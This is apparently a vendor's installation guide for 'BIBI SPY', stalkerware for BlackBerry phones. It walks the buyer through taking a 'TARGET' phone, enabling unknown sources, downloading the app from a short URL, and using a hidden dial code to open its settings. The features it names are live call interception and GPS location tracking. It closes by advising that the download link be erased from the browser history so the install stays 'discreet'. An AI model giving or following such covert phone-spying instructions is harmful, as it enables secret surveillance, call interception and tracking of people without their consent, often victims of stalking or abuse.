INSTALLATION FOR BLACKBERRY
Decide if you require features that need root permission. If you do please root the device before continuing.
1. You must have a TARGET phone physically in your hand for installation.
2. The TARGET phone has internet access. This can be through Wifi, GPRS or 3G.
3. “Unknown Sources” function must be enabled.
4. Live Call Intercept requires conference call ability on the TARGET phone.
5. GPS must be enabled for Location Tracking.
6. If all the above complete please go on.
From your account Dashboard, click ‘Account’ from the side menu. Now, click on the tab “INACTIVE”. Where it says “License key”, you will see your software activation code. Please write this down to activate your software during installation. See the picture below for example.
All of these installation steps are performed entirely on the TARGET phone itself. We are using Blackberry firmware version 7.1.0 as an example. For TARGET phones running earlier or later versions of the Blackberry operating system, the steps may be slightly different.
1. Get the phone in hand and open the phone’s web browser.
2. Enter the download link “http://dmw.cc/d” and hit Go. If platform of the phone can be detected by the software, you will be taken to step 4 automatically. If not, please follow step 3.
3. Tap “Blackberry”.
4. Tap “Download”.
5. Download begins. Please wait for the download to complete.
6. Installation has now been done. Please ignore this popup. No need to tap on it, but wait for the next screen to be shown.
7. Tap “Save” to grant permissions. If you don’t see this screen, don’t worry as permissions may have already been set up on some models.
8.Now you can tap “OK”.
9. Go back to HOME screen and tap to “Call”.
10. Type in *#900900900
11. Dial or call *#900900900 and then quickly hit “End Call” to enter the software settings screen. Some phones may not need to press the End Call button.
12. Software is ready to be activated.
13. Press the phone’s Menu key and then tap on “Activate”.
14. Enter the Activation Code (License Key) you recorded from your account Dashboard, and tap “Activate”.
15. Activation begins. Please wait to fully activate the software.
16. Congratulations! You have successfully activated the software.
To remain discreet, it is recommended to remove download URL (http://dmw.cc/d) from the phone’s web browsing history. You have now completed the installation process for BIBI SPY.